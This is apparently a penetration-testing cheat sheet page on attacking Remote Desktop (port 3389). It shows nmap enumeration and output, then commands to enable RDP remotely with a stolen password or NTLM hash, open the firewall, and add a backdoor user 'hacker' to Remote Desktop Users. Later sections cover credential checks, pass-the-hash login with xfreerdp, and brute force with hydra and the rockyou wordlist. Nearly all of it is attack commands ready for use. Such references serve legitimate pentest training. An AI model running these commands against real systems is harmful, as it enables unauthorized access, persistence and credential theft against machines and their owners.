3389 - RDP | d4t4s3c hacks & pills

Information

Default Port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-04T18:13:10+00:00; +8h59m59s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: TECH
|   NetBIOS_Domain_Name: TECH
|   NetBIOS_Computer_Name: TECH
|   DNS_Domain_Name: TECH
|   DNS_Computer_Name: TECH
|   Product_Version: 10.0.17763
|_  System_Time: 2026-06-04T18:13:09+00:00
| ssl-cert: Subject: commonName=TECH
| Not valid before: 2026-06-03T18:11:38
|_Not valid after:  2026-12-03T18:11:38

Enumeration

nc -vn 192.168.1.2 3389
timeout 0.1 bash -c "nc -nv 192.168.1.2 3389"

nmap -p3389 -sS 192.168.1.2
nmap -p3389 -sVC 192.168.1.2
nmap -p3389 --script="rdp-*" 192.168.1.2

Service

Enable

Remote

netexec smb 192.168.1.2 -u administrator -p <PASSWORD> -M rdp -o action=enable
netexec smb 192.168.1.2 -u administrator -H <HASH> -M rdp -o action=enable

Local

#enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#firewall port: closed > open
netsh advfirewall firewall add rule name="RDP Port" protocol=TCP dir=in localport=3389 action=allow
netsh advfirewall firewall add rule name="RDP Port" protocol=TCP dir=out localport=3389 action=allow

# create user & add group
net user hacker Password1 /add
net localgroup "Remote Desktop Users" hacker /add

Disable

Remote

netexec smb 192.168.1.2 -u administrator -p <PASSWORD> -M rdp -o action=disable
netexec smb 192.168.1.2 -u administrator -H <HASH> -M rdp -o action=disable

Local

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Check Credentials

netexec rdp 192.168.1.2 -u administrator -p <PASSWORD>
netexec rdp 192.168.1.2 -u administrator -p <PASSWORD> --local-auth

netexec rdp 192.168.1.2 -u administrator -H <HASH>
netexec rdp 192.168.1.2 -u administrator -H <HASH> --local-auth

impacket-rdp_check administrator:Password1@192.168.1.2

Connect

xfreerdp /v:192.168.1.2 /u:administrator /p:Password1 /cert:ignore +clipboard /dynamic-resolution
xfreerdp /v:192.168.1.2 /u:administrator /pth:<HASH> /cert:ignore +clipboard /dynamic-resolution

sleep 2; remmina &> /dev/null &

Brute Force

hydra -t 64 -l administrator -P rockyou.txt rdp://192.168.1.2
netexec rdp 192.168.1.2 -u administrator -p rockyou.txt